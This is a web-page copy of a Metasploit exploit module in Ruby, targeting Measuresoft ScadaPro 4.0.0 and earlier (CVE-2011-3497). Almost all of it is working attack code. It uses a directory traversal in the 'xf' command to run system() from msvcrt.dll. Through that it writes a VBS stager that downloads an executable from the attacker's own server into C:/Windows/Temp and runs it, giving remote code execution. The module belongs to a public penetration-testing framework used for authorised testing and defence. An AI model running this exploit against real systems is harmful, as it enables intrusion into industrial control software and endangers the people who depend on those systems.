Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/scadapro_cmdexe.rb
19513 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::Remote::Tcp

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Measuresoft ScadaPro Remote Command Execution',

18
        'Description' => %q{

19
          This module allows remote attackers to execute arbitrary commands on the

20
          affected system by abusing via Directory Traversal attack when using the

21
          'xf' command (execute function). An attacker can execute system() from

22
          msvcrt.dll to upload a backdoor and gain remote code execution. This

23
          vulnerability affects version 4.0.0 and earlier.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Luigi Auriemma', # Initial discovery/poc

28
          'mr_me <steventhomasseeley[at]gmail.com>',  # msf

29
          'TecR0c <tecr0c[at]tecninja.net>',          # msf

30
        ],

31
        'References' => [

32
          [ 'CVE', '2011-3497'],

33
          [ 'OSVDB', '75490'],

34
          [ 'BID', '49613'],

35
          [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],

36
          [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],

37
          # seemed pretty accurate to us ;)

38
          [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],

39
        ],

40
        'DefaultOptions' => {

41
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

42
        },

43
        'Platform' => 'win',

44
        'Targets' => [

45
          # truly universal

46
          [ 'Automatic', {} ],

47
        ],

48
        'DefaultTarget' => 0,

49
        'DisclosureDate' => '2011-09-16',

50
        'Notes' => {

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'Stability' => UNKNOWN_STABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57


58
    register_options(

59
      [

60
        Opt::RPORT(11234),

61
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),

62
      ]

63
    )

64
  end

65


66
  # couldn't generate a vbs or exe payload and then use the wF command

67
  # as there is a limit to the amount of data to write to disk.

68
  # so we just write out a vbs script like the old days.

69


70
  def build_vbs(url, stager_name)

71
    name_xmlhttp = rand_text_alpha(2)

72
    name_adodb = rand_text_alpha(2)

73


74
    tmp = "#{@temp_folder}/#{stager_name}"

75


76
    vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "

77
    vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"

78
    vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "

79
    vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "

80
    vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "

81
    vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "

82
    vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"

83


84
    return vbs

85
  end

86


87
  def on_request_uri(cli, request)

88
    if request.uri =~ /\.exe/

89
      print_status("Sending 2nd stage payload")

90
      return if ((p = regenerate_payload(cli)) == nil)

91


92
      data = generate_payload_exe({ :code => p.encoded })

93
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

94
      return

95
    end

96
  end

97


98
  def exploit

99
    # In order to save binary data to the file system the payload is written to a .vbs

100
    # file and execute it from there.

101
    @payload_name = rand_text_alpha(4)

102
    @temp_folder = "C:/Windows/Temp"

103


104
    if datastore['SRVHOST'] == '0.0.0.0'

105
      lhost = Rex::Socket.source_address('50.50.50.50')

106
    else

107
      lhost = datastore['SRVHOST']

108
    end

109


110
    payload_src = lhost

111
    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

112


113
    stager_name = rand_text_alpha(6) + ".vbs"

114
    stager = build_vbs(payload_src, stager_name)

115


116
    path = "..\\..\\..\\..\\..\\windows\\system32"

117


118
    createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"

119
    download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

120


121
    print_status("Sending 1st stage payload...")

122


123
    connect

124
    sock.get_once()

125
    sock.put(createvbs)

126
    sock.get_once()

127
    sock.put(download_execute)

128
    handler()

129
    disconnect

130


131
    super

132
  end

133
end

134


135